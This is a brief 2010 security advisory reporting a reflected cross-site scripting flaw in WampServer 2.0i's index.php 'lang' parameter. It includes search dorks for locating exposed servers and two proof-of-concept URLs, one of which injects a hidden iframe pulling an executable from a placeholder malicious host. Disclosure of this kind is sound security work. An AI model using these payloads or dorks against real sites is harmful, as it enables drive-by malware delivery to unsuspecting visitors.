WampServer version 2.0i suffers from a cross site scripting vulnerability.
60a31928a82776a22e2b05479fb6e0060a35a6f0ab65ff1622120b9b8fa2afc4
----------------------------------------------------------------
Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability
Summary: WampServer - Apache, PHP, MySQL on Windows
Product web page: https://www.wampserver.com
Current version: 2.0i
Vulnerability discovered by Gjoko "LiquidWorm" Krstic
Zero Science Lab - https://www.zeroscience.mk
liquidworm gmail com
26.01.2010
Advisory: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4926.php
----------------------------------------------------------------
Dork:
"WampServer - Donate - Anaska"
"WAMPSERVER Homepage"
PoC:
https://[site]/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
https://[site]/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22https://[evil .exe link]%22%3E%3C/iframe%3E
//EOF